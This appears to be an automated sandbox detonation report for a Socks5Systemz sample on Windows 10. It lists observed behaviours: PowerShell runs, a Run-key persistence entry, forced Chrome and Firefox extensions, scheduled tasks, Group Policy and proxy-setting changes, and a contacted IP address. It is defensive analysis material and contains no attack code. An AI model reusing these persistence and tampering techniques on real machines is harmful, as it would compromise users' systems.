Detonation Overview
Submitted
2024-07-16 05:11
Reported
2024-07-16 05:18
Platform
win10v2004-20240709-en
Max time kernel
450s
Max time network
441s
Command Line
Signatures
Detect Socks5Systemz Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Socks5Systemz
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Downloads MZ/PE file
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 91.211.247.248 | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Snetchball = "C:\\Users\\Admin\\AppData\\Roaming\\Snetchball\\Snetchball.exe" | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks installed software on the system
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\AppData\Local\Temp\7zS4629C85A\setup.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\display.inf_amd64_71aa85b0e2292a7a\display.PNF | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_32201FF65E9A20A693462A3946A29CAE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_A71D3C9ACFD0888B19B4EAA86FAA4437 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C02877841121CC45139CB51404116B25_DE59F8C40B88A0DF57DC57DBBEDD7057 | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\oypPEctclvbNW.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files (x86)\AMqhlrBDqRJU2\jgEFQAg.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\yPccvN.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\DUmEHlW.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\KQkDXwm.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files (x86)\hMiQKFvmPLjeC\IzTFYtH.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files (x86)\UQtSSXvqU\zdIGiNQ.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files (x86)\OJBbginKvssDnbEKbsR\GnpHogS.xml | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File created | C:\Program Files (x86)\ezMWJXFFLyUn\hQEJhwo.dll | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\bEtnHIcecDUtXwQuWS.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\FPIEUdZLMYPzsiUNM.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\OcPshDNvhDnVmSv.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\Tasks\MRTHivZIQsRdEanwm.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates physical storage devices
Program crash
NSIS installer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Control Panel\Cursors\AppStarting = "C:\\Windows\\\\Cursors\\\\aero_arrow.cur" | C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1d5b4de3-0000-0000-0000-d01200000000}\MaxCapacity = "14116" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{1d5b4de3-0000-0000-0000-d01200000000}\NukeOnDelete = "0" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\HhkZqKf.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
